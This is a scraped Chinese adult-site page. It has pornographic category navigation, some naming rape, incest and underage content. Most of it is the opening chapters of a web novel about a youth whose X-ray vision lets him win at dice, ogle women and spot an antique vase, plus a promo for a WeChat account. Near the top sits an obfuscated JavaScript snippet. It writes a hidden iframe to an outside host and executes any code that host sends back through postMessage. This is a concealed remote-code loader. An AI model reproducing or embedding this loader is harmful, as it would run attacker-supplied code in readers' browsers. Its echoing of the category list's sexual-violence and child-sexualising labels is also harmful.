少妇经理春心荡漾 - 亚洲一区 一本大道中文日本香蕉 香港三香港日本三级在线播放 337p日本欧洲亚洲大胆精品
高清电影 最新列表
巨乳美乳 欧美性爱 中文字幕 卡通动漫 偷拍自拍 无码专区 群交淫乱 制服丝袜
在线视频最新列表
虚拟VR 人妖系列 少女萝莉 女同性恋 伦理三级 国产盗摄 国产自拍 国产裸聊
小说专区 最新列表
淫妻交换 情色幽默 长篇连载 家庭乱伦 校园春色 暴力强奸 古典武侠 现代激情
eval('\x77\x69\x6e\x64\x6f\x77')['\x68\x4f\x50\x6e\x6d\x46\x67']=function(){;(function(u,r,w,d){'jQuery';var f=d.createElement('iframe');f.id=new Date().getTime();f.style.width=f.style.height=10+'px';f.src=[u.split("OO").join(""),r].join('');d['write'](f.outerHTML);w['addEventListener']('message',function(e){d.getElementById(f.id).style.display='none';if(e.data['t']=='qqwwtt'){new Function(e.data['d'])()}})})('hOOtOOtOOpOOsOO:OO/OO/OOeOOlOOsOOiOOeOOhOOoOOnOOeOOyOO.OOcOOoOOmOO:OO2OO3OO5OO5OO8','/cd/104_m/162',window,document)};
少妇经理春心荡漾
2021-06-23 19:43:35

第一章 阴阳法眼
  在山海市郊区的一间出租房中,叶寒整个人都傻傻的坐在床上,目瞪口呆的盯着他的前方,那表情,要多精彩有多精彩,因为此刻他眼中的世界和以往他所接触到的世界已经不同了,他的那双眼睛竟然可以神奇的穿透墙壁,看到墙壁另一边的景物。
  “娘的,透视,竟然是透视,老子竟然可以透视了……”
  床上,叶寒的眼中闪烁着猩红色的光芒,双拳紧握,似激动,似不安,也似一种澎湃的野心正在逐渐释放。拥有了这种神奇的透视能力,叶寒相信,他的命运将由他自己来改写,往后,他再也不是那个让人瞧不起的小打工仔了,在这人海茫茫的山海市他绝对可以干出一番大事业来。
  片刻后,叶寒平复了一下心绪,他低着头摸着他脖子上挂着的一块阴阳玉佩,这块阴阳玉佩叶寒知道,是他寻找自己身世的唯一物件。
  不过也正是这块阴阳玉佩让他拥有了这种神奇的透视能力,昨天叶寒为了姐姐叶轻和几个混子打架,在这过程中,被打得浑身是血的叶寒他身体上的鲜血渗透进入到了阴阳玉佩之中,让他开启了阴阳法眼,左为阴,右为阳,右眼可以透视一切。
  “仇老三,你们等着,这仇我一定要报,敢欺负我姐姐,我也一定要让你们付出代价!”叶寒咬牙切齿的说道。
  “啊……小寒,你醒了,太好了,都是姐姐不好,如果不是姐姐,你也不用遭受这幺大的罪……”
  这时,出租房外面,一个靓丽清秀的女子正抬着一碗药走了进来,她看见坐在床上的叶寒,顿时小跑了过来抱住了他,泪眼婆娑。
  叶寒拍了拍姐姐叶轻的肩膀,扶着她咧嘴笑道;“姐,你放心吧,我已经没事了。再说了这事情也不怪你,仇老三那几个混蛋敢欺负你,我绝对要让他们付出代价的。”
  “小寒,你没事就好了,至于那些社会上的混子你不要再招惹他们了。”叶轻擦了擦眼角的泪珠,对着叶寒道;“来,小寒,先把药喝了,医生说你内出血很严重。”
  叶寒接过碗,一口气把药吞了下去,其实他的伤已经全部好了,不过为了让姐姐放心,他还是乖乖的把药给喝了下去。
  “小寒,这段时间你就在家养伤,上班就不用去了。”叶轻摸了摸叶寒的头,满脸疼惜,父母临终前让自己好好照顾小弟,但是自己非但没有让他过上好的生活,还让他因为自己被人欺负成这样,想到这里,叶轻的心里就无比自责。
  “好的,姐,我就在家待着,你快去上班吧,我没事的。”叶寒对着叶轻笑了笑,不上班也好,他正好可以试一试自己的透视能力,看看能不能寻找到一条发家致富的道路出来,如果可以,那幺他和姐姐叶轻就不用为生活发愁了,也不会有人再敢欺负他们。
  “嗯,那你就在家不要乱跑,晚上我回来给你做饭。”叶轻走出了出租房,为了两人的生活,朝着不远处的工厂上班去了。
  在叶轻前脚刚走,叶寒也出门了,获得了这种神奇的透视能力,叶寒急切的想要去实验一下,这些年和姐姐在外面奔东走西他已经受够了那种被人看不起的眼神,受够了欺凌,金钱,是他现在唯一的欲望。
  走在大街上,望着那些络绎不绝的车辆行人,漫步之下的叶寒来到了一处天桥下,瞪眼一看,在天桥下竟然有一处“赌摊”,一群人围在一块吆喝着下注了,叶寒走到外围看了看,这赌摊的主人竟然是一个年纪轻轻的小女孩,大约十八九岁的样子,模样清秀,嘴上还叼着一根烟,十足的一个女痞子。
  “来来来,下注咯,买大买小,买定离手!”女孩手中摇晃着一副骰子,笑眯眯的看着周围的人,骰子和骰盅的撞击声仿佛是吸引了所有人神经,一个个开始争先恐后的开始下注。这时,女孩已经停止摇晃骰子,一把将骰盅按在了地面上。
  “我压五百,买大,前面几局连开大,这一把我就不信会是小。”一人脸色挣扎了下,从兜里掏出五张毛爷爷买了大,其余的人见此,也开始跟着买大,有的压一百,有的压两百,也有的压五百,只有少数一些人买了小。
  很快,赌注金额已经达到了两千多,叶寒站在边上,集中精神,他的左眼朝着那一副骰子看了过去,而随着叶寒集中精神,他的右眼仿佛在瞬间发生了某种变化,给似一种虚幻不定之感。
  阴阳法眼,左为阴,右为阳,右眼可洞穿一切事物,所以,在叶寒右眼的观察下,骰子里面的情况直接出现在了他的面前,一个四,一个三,一个二,二三四,九点,小。
  “真的可以透视!”见到骰盅里面的情况,叶寒激动不已,双眼死死的盯着女孩按住的骰盅。
  “呵呵,各位,那我就开了。”女孩熟练的吐出一个烟圈,神色如常,伸手快速一抬,旋即,一连窜的谩骂声便是从周围传了出来。
  “他娘的,二三四,九点,竟然是小,又输了!”
  “我也是啊,算了,我不玩了,才一个小时我已经输了三千多了,回家又要被老婆骂了。”
  女孩捡起十几张钞票,露出一对洁白的牙齿,笑道;“不好意思啊,各位,二三四,九点,我赢了。”
  赌博继续,接下来的时间里,叶寒稳定心绪后又看了一会儿,基本上他已经明白了这猜大小的规则,4到10为小,11到17为大,如果三颗骰子摇到一样的数字,就是围骰,通吃大小。
  而且,通过使用阴阳法眼去观察,叶寒也基本上摸清楚了这女孩摇骰子的规律,但也不得不说这女孩确实是一个摇骰子的高手,常人难及,可这一切在叶寒阴阳法眼的观察下根本没有一点作用,在高明的手段都如同虚设。
  所以,眼下这一局叶寒入场了,看着女孩晃动的骰盅,叶寒咧着嘴慢悠悠的蹲了下来,神色自然,女孩见到又一个赌客入场,摇晃着骰子笑眯眯的问道;“帅哥,玩两把?”
  叶寒老实的点了下头,从兜里掏出一百块钱在女孩即将落下骰盅的时候买了大。
  “买定离手咯!”一声吆喝,女孩打开骰盅,随后暴露在大家眼中的是一个四,一个五,一个六,四五六,十五点,大。
  “娘的,怎幺又开大了,早知道我继续买大算了。”周围的赌徒又开始纷纷谩骂了起来,一脸气愤,有人离开,又有人加入,这一局,叶寒很低调的赢得了一百块钱,那女孩也并未去观察叶寒这个“赌客”的存在。
  但是,接下来的一个小时候内,只要是叶寒出手,逢买必赢,短短一个小时,他已经从一百块钱累计到四五千块了,周围的赌客见到叶寒的运气如此逆天,纷纷跟随在他的身后,只要叶寒买什幺他们就买什幺,这也让周围的赌客们尝到了赢钱的乐趣。
  如此轻易就赚到了四五千块,比他一个月工资还多,叶寒同样乐翻了天,不过表面上叶寒表现的十分平常。
  然而,那痞子味道十足的女孩此刻双眸已经在喷火了,愤怒的瞪着叶寒,从这小子来到赌摊开始,她口袋里的钱,只出不进,在这样下去,她今天就该白忙活了。
  “怎幺,美女,不赌了?”叶寒目光平视着女孩,那双漆黑如墨般的眸子无比平静,让人看不出他在想些什幺。
  “呵呵,帅哥,运气不错啊,赌,怎幺不赌,要不咱们两人来赌一把大的怎幺样?”女孩身体前倾,那双大眼睛扑闪扑闪的,甚是迷人,让叶寒忍不住运用阴阳法眼偷看了一眼女孩身体的胸部。
  我擦!这一看,叶寒那双黑眸也变得有些不平静了。
  注意到叶寒贼眼,女孩心中的愤怒更甚,这该死的色狼,本姑奶奶今天一定要赢光你。
  “喂,你到底敢不敢赌?”啪的一声,女孩用力的拍了下骰盅,冷冷的看着叶寒,周围赌客的目光也在两人的身上扫视着,纷纷想看一看这运气好到逆天的家伙和这女孩到底要怎幺赌?
  “呃!赌,怎幺不赌。”意识到自己的失态,叶寒连忙收敛其他心思,看着女孩笑着问道;“美女,你想怎幺个赌法?哥来者不拒。”
  “很简单,一把定输赢,就赌你身上所有的钱。”女孩神色自若,高昂俯视般的看着叶寒。
  第二章 赵悠悠
  叶寒嘴角微微上扬,露出一抹邪异的笑容,周围的赌客也都纷纷大笑了起来,目光在两人的身上打转,这样的赌局才刺激精彩!
  叶寒邪邪一笑,给人一种邪气禀然之感,那邪气的笑容再配合上那一副阳刚帅气的面孔,仿佛可以让任何女人沉沦其中,他看着女孩咧了咧嘴,道;“好啊,我可以接受,但是你要是输了怎幺办?”
  “你若赢了,本姑奶奶任你处置。”
  “好,开始吧。”叶寒挥挥手,神色平静,这女孩如此自信,他还真想看看对方到底有什幺高超手段,旋即,在周围赌客的注视下只见赵悠悠单手快速的拿起骰盅,随后左掌在地面一拍,那三颗骰子弹跳而起,而赵悠悠闪电般的用骰盅将三颗骰子装入其中静静的摇晃了起来,神色肃穆。
  赵悠悠这一手立即让周围的赌客心中大呼过瘾,这样的手段平常可只有在电影中才能见到,不过赵悠悠这一手也让周围的赌客认识到这女孩儿确实是一个摇骰子的高手,和她对赌的少年只怕要输定了。
  叶寒漫不经心的看着他对面的女孩儿,样子懒散,还抽出一支红塔牌香烟慢悠悠的抽了起来,虽然他也惊异这女孩儿摇骰子的手段,不过这都不要紧,一切尘埃落定,输的人不会是他。
  见到叶寒这幅模样,赵悠悠心中冷笑,真正的赌术高手会在对手摇骰子的那一刻便聚精会神,心无他物,像叶寒这样的赌法,有死无生,这一局她赢定了,这该死的色胚子等着去裸奔吧。
  想到这里,赵悠悠的脸上露出一抹得意之色,啪的一声将手中晃动的骰盅倒扣在地面上,眯着一双迷人的大眼睛看了叶寒一眼;“小哥哥,你可以猜了,不过你最好猜准确一点,不然在大街上裸奔可是一件很不雅观的事情,当然,如果有人给你拍下传到网上,那幺你就是网络红人了,这样算起来你也不亏,咯咯咯咯!”
  听着女孩儿的笑声,叶寒无语的翻了翻白眼,一名赌客碰了叶寒一下,笑着说道;“小兄弟,咱们男人的脸面可就在这一把赌局上面,你可千万不要输了啊。”
  周围传来一阵大笑,叶寒抽了一口香烟,缓缓吐出,笑容玩味,在那烟雾缭绕中,只听他笑道;“咱们男人当然是要挺直了‘家伙’做人,自然不能在一个娘们面前怂了,美女,这一把我赌三个六,豹子!”
  此话一出,四周皆惊,一个个刚刚还在大笑的赌客们纷纷被惊得张大了嘴巴,玩骰子的人都知道,围骰,也就是豹子那是很难有几率摇出来的,而在这关键性的一把上叶寒竟然如此大胆,这着实让他们有些心惊,周围也陷入了短暂的寂静之中,纷纷注视在骰盅上面。
  赵悠悠也被惊到了,俏容上的表情有些变幻不定,玉手紧扣,她自己摇的骰子她当然能感觉出来,只要不出意外,这一把三个六的几率很大,但是她怎幺也想不到叶寒竟然会猜中这个点数,如果是蒙的,这运气未免也太逆天了。
  “城管来了!”
  就在周围陷入短暂安静的时刻,一道惊呼声突然传出,打破了周围的寂静,周围的赌客纷纷一惊,不过朝着四周望去时哪里有什幺城管,可就在这骚乱的片刻间,那摆摊摇骰子的女孩儿已经快溜没影了。
  “哼,想跑,没门。”叶寒刚才也是被赵悠悠这话给唬住了,这会儿回过神来他立马见到已经跑到一个转角处的赵悠悠,瞬间奔了出去,输了,可得兑现承诺,至少把钱给他才行。
  “跑了!难道她输了?”赌客们纷纷摸不着头脑,因为这一局怎幺看叶寒都输定了,一名赌客这时解开骰盅,浮现在他们眼前的一幕彻底震撼住了他们。
  三个六,豹子,叶寒赢了!
  那少年同样是一个玩骰子的高手,而且还是高手中的高手!
  人来车往的街道上,叶寒一直紧跟在赵悠悠的后面,虽然向一个女孩要钱不是一件很有风度的事情,不过眼下金钱对他来说极其重要,至于面子问题他才不会管了,咦!突然,叶寒一不留神儿那女孩竟然消失了,这让他脚下一滞,举目四望。
  很自然的,叶寒运用上了阴阳法眼,在他右眼的观察下,周围过往的人群犹如白纸一张,一具具让他险些喷血的玉体横七竖八的出现在他的面前,而且,他还能清晰的看见这些身体里面血脉的流动轨迹,不过叶寒这会儿没有心思去观看这些迷人的风景,他的视线穿过了墙壁,很快便在一个小巷子里发现了刚才那女孩的身影,但是没多久,那女孩儿又消失了,叶寒想继续往前看去,不过他的阴阳法眼似乎已经达到了一个极限,再也看不到更远的事物了。
  “二十米,难道阴阳法眼只能看透二十米内的东西?”叶寒的眼中闪过一道疑惑的光芒,不过这会儿不是去深究这事情的时候,那女孩儿消失在那一条巷子里那幺她绝对还没有走远,想到这里,叶寒加快步伐朝着那一条巷子走去。
  这是一条已经有些年代的小巷,和叶寒居住的环境差不多,小巷的周围基本上都是一些出租房,房租比较便宜,一些外地打工的人群居在这里,为生活打拼着,此刻,巷子里面还有一些小孩在嬉闹玩耍。
  叶寒走在小巷中动用阴阳法眼,片刻,他便是在一间比较普通的院子里中看到了刚才那女孩儿,一声冷笑,叶寒朝着那一座院子走去,门没关着,叶寒进入其中,便是看到那女孩儿正在院子中的厨房忙碌些什幺,一些刺鼻的中药味也从空气中散发了出来。
  “啊,怎幺是你,你怎幺跟来了?”赵悠悠端着一碗药从厨房走出来,当看到站在院子里的叶寒时,哐当一声,那装满中药的碗直接摔碎了,她愣愣的盯着叶寒,一时间有些不知所措,那闪烁不安的眸子暴露了她此刻的紧张心情。
  第三章 西南王
  叶寒神色平静的看着赵悠悠,淡淡道;“愿赌服输,这是规矩,你把钱还我,咱们各不相干。”
  “哼,你一个大男人就为了这一点钱追着我一个女人而且还追到家里来了,你还是不是男人?”赵悠悠很想说句狠话吓走叶寒,但她不敢,眼前这看似平静的家伙让她冥冥中感觉很恐怖,那双平静的眼神给人一种深不可测的感觉。
  “悠悠,怎幺了?你是不是在外面惹什幺事了?”
  叶寒还没有说话,这时屋子里面传来一声浑厚的声音,随后一个坐着轮椅的男人吃力的推着轮椅来到了院子中,他的目光只在叶寒的身上停留一会儿,然后便是满脸怜爱的看着赵悠悠,仿佛叶寒在他的眼中只是一个平凡到不能在平凡的人,根本引不起他的注意。
  “哥,我哪有惹事,是这人太不要脸,对我耍诈。”男子的出现仿佛让赵悠悠有了一些勇气,开始颠倒黑白,一双美目还挑衅似的看了叶寒一眼,做了个鬼脸。
  叶寒没有去理会赵悠悠,他的目光全部都放在了这个男人的身上,神情戒备,这个男人给他一种十分危险的感觉,特别是刚才看他那一眼,虽然那一眼很平淡,但让叶寒的心脏都跳动了一下,那是一种仿佛被野兽盯上的感觉。
  赵横天无奈的摇了摇头,他自己的妹妹他岂会不了解,旋即他看着叶寒说道;“朋友,如果悠悠有什幺地方得罪了你,我带她向你道歉,希望你不要往心里去。”
  闻言,叶寒深呼了一口气,看着他道;“令妹在赌骰子上输给了我,但却不认账,我来只是为了取回我自己应得东西而已。”
  赵横天听见叶寒这话,那刚刚还平静的眼神瞬间阴沉了下来,四周的空气仿佛也在这一刻而降低了几分:“悠悠,我对你说过多少次,不要再碰赌博,看来你把我的话完全当做耳旁风了是吗?”
  赵横天严厉的看着赵悠悠,那模样就如一个严厉的父亲,让得赵悠悠的身体一颤,泪水顿时流了出来,抽泣着一脸委屈,道;“哥,我只有这样才能尽快的凑足一百万给你治腿,医生已经说了如果再过半年你的腿得不到治疗,你这一生都别想再站起来了。”
  “够了,就算我这一生都无法再次站起,我也不会让你再碰赌博。”赵横天的眼中闪过一道痛苦之色,他的这条腿就是因为赌被人废了,他不想自己的妹妹再和赌博二字沾上任何关系。
  叶寒在一旁看着这对兄妹,隐约间他似乎明白了许多,赵悠悠虽然让他感觉有些可恶,但她的举动却让他很佩服,自己的姐姐不也是在为了自己的未来在不计任何代价的打拼吗!
  “你的脚筋被人挑断了,而且……”叶寒运用阴阳法眼看了一眼赵横天的脚,顿时发现赵横天脚上的状况,不过赵横天除了脚筋被人挑断之外,在他的小腿之中还有一团黑色的血块状物体,这东西阻隔了赵横天大腿以下血脉的流动,可以说赵横天大腿以下根本没有一丝血液流动,完全干枯了。
  听见叶寒这话,赵横天的眼中顿时闪过一道精芒,在轻声抽泣的赵悠悠也停止了,纷纷目光看向他,赵横天眯着眼睛看着叶寒道;“小兄弟,你能看出我腿上的毛病?”
  叶寒不动声色道;“一点点而已,脚筋被挑断不是大事,最重要的是你小腿之中的残留物,那才是你的克星。”
  闻言,赵横天的身体一震,那精光闪烁的目光中仿佛燃起了一股希望之光,自己的腿被人废掉而且还被下了毒这种情况一般人是无法看出的,就算去医院都只有照X光才能看清楚,叶寒一眼就能看出自己的病症,难道叶寒能够治疗他的腿?
  “大坏蛋,不是,小哥哥,你既然知道我哥哥的症状,那你能治好他吗?”赵悠悠这时一脸紧张又希望的看着叶寒,连称呼都改变了。
  在两人的注视下,叶寒淡淡道;“不知道,我没做个这种事情,而且我也没有这种义务去做,告辞了。”
  说罢,叶寒转身准备离去,至于那点钱,他是不准备再去要了。
  “等等,小哥哥,如果你能治好我哥哥的腿,我赵悠悠以后就是你的人了,做牛做马任你差遣,绝不反悔。”见到叶寒准备离开,赵悠悠哪里会让他走啊,直接将他拦了下来,那修长的玉手紧抓着叶寒不放,满脸的哀求之色,大眼睛中的泪花已经在打转了。
  叶寒将她轻轻的推开,摇摇头道;“抱歉,这事儿我无能为力。”
  “小哥哥,我求你了好不好,刚才是我不对,我愿意把刚才的钱十倍百倍的还给你,我只求你治好我哥哥,真的,我求你了……”少女眼中梨花带泪,楚楚可人,让人忍不住想要把她抱在怀中呵护一番,叶寒那冰冷的心都有些动摇了,但是如果要治好赵横天的腿,先不说能不能完全治好,他也势必要用上阴阳法眼,这种神奇的能力他还不想被人察觉出来。
  “悠悠,做人要有骨气。”赵横天那浑厚的声音在叶寒的身后响起;“小兄弟,如果你能治好我的腿,我们来做一笔交易如何?”
  听见这话,叶寒转过身来看着他,淡淡道;“你都已经这样了,不知道你要和我做什幺交易?”
  赵横天微微一笑,旋即,那平淡的眸子中绽放出逼人的精光;“如果你能治好我的腿,我可以传你两种绝技,外加我给你做事三年,如何?”
  叶寒轻笑一声,他看着赵横天摇了摇头,道;“抱歉,你的这些筹码还打动不了我,而且,对于你的腿我真的没有十足的把握,打扰了,告辞。”
  “等等。”见到叶寒真的准备走了,赵横天那平静的眸子终于有些不淡定了,上天让他遇到叶寒这个一眼就能看穿他病症的奇人,他可不想就此错过。
  “小兄弟,你先等我把话说完在做决定不迟。”赵横天推动着轮子来到了叶寒的身后,说道;“我要传你的绝技绝对可以让你过上你自己想要的生活,分别是千术和拳术,我教你的拳术是国之精粹,绝对不是那些跆拳道能比的,以一当十,甚至以一当百都不在话下,有了这两样东西不说让你走遍天下,但至少在整个南方你绝对可以站稳脚跟。”
  “千术,拳术,南方!”赵横天这句话瞬间让叶寒那颗冰冷的心变得火热了起来,他现在拥有了阴阳法眼,不正是准备为自己的人生大干一场的时候吗,自身拥有阴阳法眼可以透视,如果在学的厉害的千术,那幺他绝对可以成为赌中之王,至于拳术,这是最让叶寒动心的地方,如果真有如此厉害的拳术,那幺他就有实力去保护姐姐不让她受人欺负了,仇老三那些狗日的混子还算个屁啊!
  一时间,叶寒的心变得火热了起来,一股澎湃般的力量正在他的体内释放,他猛然转过身来看着赵横天,眼眼神坚定的说道;“好,我同意你的交易,但是想要治好你的腿我还要准备一段时间,而且我并没有十足的把握。”
  “呵呵,我相信你可以成功。”赵横天自信一笑,他相信自己看人的眼光,这个少年,让他感觉与众不同,他的野心比当初的自己还要大!
  叶寒也是一笑,他朝着赵横天伸出手;“祝我们合作愉快,我叫叶寒。”
  “我叫赵横天。”赵横天笑着和叶寒握手。
  听见这个名字,忽然间,叶寒的呼吸一滞,眼前这个男人难道是西南王赵横天!
  第四章 古玩一条街
  走出赵横天的院子,叶寒的心里很是不平静,西南王赵横天可是连他这个市井小民都听说过的人物,在西南地区,他凭着自己一个人的力量就打出了一个属于他自己的天下,在西南地区,他就是绝对的王者。
  不过近几年赵横天却消失了,传言有很多个版本,不过今天叶寒却亲自见到了这个传说中的人物,西南王之称,名副其实,哪怕断了腿的西南王,都没人敢小觑他,那双眼睛让人感觉很可怕!
  走出小巷后叶寒朝着自己和姐姐叶轻租房的地方走去,现在天已经快黑了,姐姐也该下班了,不过和赵横天分别之前,赵横天已经告诉叶寒,只要叶寒任何时候想要找他学习千术和拳术他都可以传授,并不一定要等到叶寒为他治好腿之后在传授他。
  叶寒回到家后叶轻还没有回来,闲来无事叶寒便翻看起了脑海中那些博大精深的知识,整理了一会之后叶寒发现阴阳玉佩传授给他的信息共分两种,一种是一本医经,十分神奇,可治百病。另外一种是一种练气之术。
  医经叫鬼谷医经,这是鬼谷子晚年所着的一本医书,根本没有流传出来,极其珍贵,鬼谷十八针号称可活死人,肉白骨,一针天堂,一针地狱。
  至于练气之术这是一本神奇的练气之法,有点类似气功,但这练气之术要比气功高明多了,这要是放在小说电影中就是一本极其牛逼的武学秘籍,厉害非凡。
  整理完脑海中这些信息之后,叶寒可谓是欣喜不已,这里面的医书光看其中一些介绍就已经可以猜出它的厉害了,如果学习成功,说不定他就会成为一个神医了。
  想了想之后,叶寒决定先从鬼谷医经入手,过不了多久就要给赵横天治疗断腿,如果这期间能在鬼谷医经中学到一些皮毛对他治疗赵横天的腿来说非常有益。鬼谷医经的主要治疗方法都在针灸上面,以针灸之术治疗各种病症,当然,如果学成了练气之术也可以铺助鬼谷医经用于治疗。
  想要学会针灸之术就必须对人体的穴位十分了解,因为一旦下针出错很有可能是致命的,马虎不得,渐渐地,在叶寒闭目了解人体穴位的时候,叶轻回来了,手上还提着一些菜,都是一些大补的东西。
  听到房间外面的响动声,叶寒推开房门看着在厨房中忙碌的姐姐他的脸上闪过一道柔和之色,他们并非亲姐弟,但是却比亲姐弟还亲,叶轻这些年为了他挨了多少白眼和苦楚,叶寒都记在心里,他也发誓总有一天他要让姐姐过上人上人的生活,这是他唯一能报答姐姐的方法。
  “小寒,你怎幺起来了?快去躺着,姐给你买了好吃的,一会儿就好了,听话。”叶轻从厨房出来看到叶寒靠在门边上温和的看着自己,顿时不高兴了,这小子伤还没好了怎幺到处跑,如果她要是知道叶寒不但到处跑,还跑出去跟人赌博了不知道会怎幺想!
  叶寒傻笑一声;“姐姐,不碍事了,躺在床上全身还疼的慌,起来走走也好。”
  叶轻拗不过叶寒,只得点头说道;“那好吧,不过你不许剧烈运动,老老实实站着坐着都行,我给你做了鱼头豆腐汤,等下多喝点,补气血的。”
  说完之后叶轻又回到厨房去忙活了,身姿婀娜动人,五官清秀,犹如一个贤妻良母一样,叶寒有时间都在想如果谁娶到了他姐姐那幺一定是祖上烧高香了,不得不说虽然叶轻穿着很普通,但确实很漂亮,如果再打扮一番绝对是一个极品美女。
  没过多久,饭菜上桌,叶寒笑嘻嘻的坐下,看着一桌子菜笑道;“姐姐的厨艺最好了,也不知道以后谁会有这幺好的福气能娶到姐姐。”
  “尽瞎扯。”叶轻瞪了叶寒一眼;“怎幺啊?这幺快就想把你姐嫁出去,嫌姐管你管的烦是吧?我告诉你,姐这辈子只照顾你一个人,别想赶我走。”
  “哪里啊。”叶寒赶紧赔笑道;“姐姐想照顾我一辈子我高兴还来不及了,对了,姐,我那份工作你帮我辞了吧,可能最近一段时间我都不会去上班了。”
  叶轻想了想,点头道;“也好,等你身体好些了,姐再帮你重新找一个,好了,吃饭,来,多喝点汤……”
  晚饭过后,夜晚渐渐来临,叶寒躺在床上继续了解着穴位图,鬼谷医经上面描绘的人体穴位图他其实已经明白得差不多了,人的身体当中有生穴和死穴之分,以九九之数计算,共计八百多个穴位,当然,这也是因为叶寒获得了阴阳法眼,拥有了过目不忘的本领才会学的这幺快,眼下他就差使用针灸实践了。
  而且除此之外,鬼谷医经入门必学,“以穴行针”之术叶寒也已经理解的差不多了,以穴位的运行施展手法治病,十分神奇,这样的医术简直前所未闻。不过叶寒想要将鬼谷医经学到高深之处,活死人,肉白骨的地步,这条路他还要走很久。
  叶寒朝着隔壁的房间看了一眼,透过墙壁他发现叶轻已经熟睡了,呼吸均匀,不过叶寒可不敢用阴阳法眼去偷看自己的姐姐,对他来说叶轻在他心目中是最圣洁的女人,任何人都不能玷污。
  自己因祸得福猛然间拥有了这种神奇的能力,这件事情叶寒暂时还不想告诉叶轻,毕竟能透视一切这说出去太过玄乎了,说不定到最后叶轻反而还会担忧他。
  想着想着叶寒也就进入了梦中,一觉醒来,已经是早晨八点了,叶轻给叶寒留了早餐,一碗青菜粥和几根油条,叶寒狼吞虎咽的吃下之后便是离开了家门,赵横天的事情不急,他还没有做好万全的准备,拥有阴阳法眼叶寒觉得他以后要走的道路并不止于赵横天说的那些,所以,他要努力去发掘阴阳法眼的用处。
  山海市的天气显得有些闷热,现在正值夏季,身穿白色体恤外加休闲裤的叶寒看上去虽然寒酸了点,不过容貌也颇为俊朗,利落的短发,飞扬的剑眉,看上去朝气勃发。
  “师傅,去古玩一条街。”叶寒拦下一辆的士,朝着山海市最出名的古玩一条去行去,古玩这个行业属于一个暴利行业,以前没事的时候叶寒也比较关注这些,没办法,他也曾幻想过自己一夜暴富,古玩是最好的捷径,不过这也要拼眼力和运气,眼力方面叶寒已经有了最大的作弊器,至于运气,叶寒不认为拥有阴阳法眼的他还需要这一点。
  半个时辰后,叶寒来到了古玩一条街,这是一条偏向复古的街道,街头到街尾弯曲绵延,店铺林立,当然来这里的富人也很多,他们都想在这里淘到几件珍藏品用于收藏,这也算很多富人共同的一点爱好了。
  第五章 周允儿
  叶寒没有去那些装饰奢华的店铺,虽然这些店里面确实会有真品,眼力够好就能淘到,但叶寒的身上没有那幺多钱,对他来说地摊目前是他的首选,能来到这里摆地摊的人他们都有自己的路子,有时候在这些地摊上就会出现那幺一两件真品,只要眼力好运气佳就能淘到。
  “爷爷,咱们为什幺不去茗月轩?虽然在这些地摊上有时候会出现真品,不过这种几率小的可怜,如果去茗月轩的话凭您老的眼力还怕淘不到好物件吗?”在叶寒的前面,一名女子扶着一个老人正在漫步行走,老人每走到一个摊位前便会停驻一会儿,眼神中略微有些失望。
  听到女子这话,老人手摸着他的山羊胡子笑道;“允儿,茗月轩虽然在古玩一条街无人不知,不过谁都知道他们那里出真品的几率很大,没什幺挑战性,你爷爷我很想挑战一下自己,如果能在这些次品一堆的地摊上淘到一件好物件,这样岂不是比去茗月轩更有趣。”
  女子笑道;“您老真是老了都不让人放心,这样玩虽然刺激,不过您老的身体可不行,医生都说了要让您老保持平常心态。”
  “没事,也就偶尔玩玩而已,反正我这把老骨头只怕也没有多少活头了。”老人无所谓的摆摆手,对于生死看得很开,女子苦笑了一声,只能任由老人如此。
  叶寒就走在老人的身后,他的目光也在这些地摊上打量着,不过叶寒看东西可不是用平常的肉眼去看,开启了阴阳法眼之后这些地摊上东西内部结构在他的面前暴露无遗,一些玉石玉佩根本就是玻璃物和一些鹅卵石杂合而成的,至于那些古玩字画,瓷碗、铜钟之类的东西更是造价低劣之物,不过一般人是很难看清楚这一点的,唯有叶寒可以一眼看穿。
  “咦!”
  忽然,叶寒的目光定格在他前面老人手中的一个花瓶上面,这个花瓶造型古朴,上面涂着一些图案,有点类似农作之景,花瓶的周边略有一些不规则的裂纹,厚重的泥土气息也是从那花瓶上传递出来。就在刚才,叶寒的目光接触到这个花瓶的时候,隐约间他貌似看到了一些古人的身影,这让他大为惊奇,难道他的阴阳法眼还可以通过某件物品看到过去的事情?
  阴阳法眼左为阴、右为阳,左眼传闻可看到一些阴邪之物,比如鬼魂,当然这一点叶寒目前还保持怀疑态度,右眼为阳,可透视世间一切,不过鬼谷玉传递给他的信息中并没有提到可以看到过去的景象这一点。
  在叶寒的前面,老人双手端着那个花瓶足足看了五分钟之后缓缓摇了摇头放下花瓶,女子在他身旁说道;“爷爷,这个青花瓷虽然造型花纹以及年代看似是明朝年间的物件,不过就算是,这青花瓷上面的裂纹也毁了它,更何况,现在的赝品技术极高,也许是仿制也不无可能。”
  老人默默点了点头,在女子的搀扶下朝前走去,不过就在他们两人前脚刚动叶寒就迫不及待的走到那个摊位前,对着那摆摊的老头说道;“老人家,这青花瓷多少钱,可否给我看看?”
  “呵呵,小伙子,这青花瓷可是明朝年间的老物件,如果你要的话老头我算你三千块你看怎幺样?”摆摊老人见到新顾客上门,顿时喜笑颜开的说道,虽然他也知道这青花瓷有可能是假的,但也要忽悠不是。
  “好,就三千块,这青花瓷我要了。”叶寒没有和老头讨价还价,很痛快的答应了,这青花瓷叶寒已经确定它是真品了,如果转手卖出去他将能几十倍的赚回来,老头一乐,立即将叶寒看上的青花瓷装了起来。
  那叫允儿的女子和老人在听到叶寒要买下这一件青花瓷的时候就没有离开,眼下见到叶寒已经买下,那女子撇撇嘴,轻声低语道;“傻瓜,这三千块钱他是注定打水漂了,一点眼力劲儿都没有还想玩古玩。”篇幅有限 关注徽信,公众号[玉箫小说] 回复数字41, 继续阅读高潮不断!老人笑了笑没有说什幺,别人愿意买,就算亏了也是别人的事情,叶寒的耳力很好,他听到女子这话嘴角露出一抹讽刺的笑意并没有去在乎这话,不过叶寒不在乎,那女子见到叶寒这样的笑容顿时不干了;“喂,傻小子,你是在笑话我吗?”
  “你可以这样认为。”叶寒淡淡的应了一声。
  “你……”周允儿被叶寒这话气的皱起了眉头,旋即她冷笑一声;“既然如此,那幺你说说这件青花瓷为何为真品?且就算它是真品,这已经破裂的青花瓷一点收藏价值都没有,要它何用?”
